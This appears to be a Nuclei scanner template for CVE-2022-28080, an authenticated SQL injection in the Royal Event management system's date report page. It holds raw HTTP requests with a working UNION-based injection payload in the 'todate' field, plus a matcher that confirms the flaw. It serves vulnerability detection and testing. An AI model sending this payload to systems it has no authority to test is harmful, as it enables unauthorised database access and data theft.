id: CVE-2022-28080 info: name: Royal Event - SQL Injection author: lucasljm2001,ekrause,ritikchaddha severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. remediation: | To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated - https://nvd.nist.gov/vuln/detail/CVE-2022-28080 - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.01516 epss-percentile: 0.85517 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: event_management_system_project product: event_management_system tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms,intrusive,event_management_system_project http: - raw: - | POST /royal_event/ HTTP/1.1 Host: {{Hostname}} Content-Length: 353 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="username" {{username}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="password" {{password}} ------WebKitFormBoundaryCSxQll1eihcqgIgD Content-Disposition: form-data; name="login" ------WebKitFormBoundaryCSxQll1eihcqgIgD-- - | POST /royal_event/btndates_report.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="todate" 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- - ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="search" 3 ------WebKitFormBoundaryFboH5ITu7DsGIGrD Content-Disposition: form-data; name="fromdate" 01/01/2011 ------WebKitFormBoundaryFboH5ITu7DsGIGrD-- matchers-condition: and matchers: - type: word words: - '{{md5("{{randstr}}")}}' - type: status status: - 200 # digest: 4b0a00483046022100e1651e968717d73648a2104adcb80b5e9238ecf86402034dd6e00bf4beb8fc1d022100bf735d155de83f8becfbe851be1a0dd16cc5d83415cd996268554963f67b59de:922c64590222798bb761d5b6d8e72950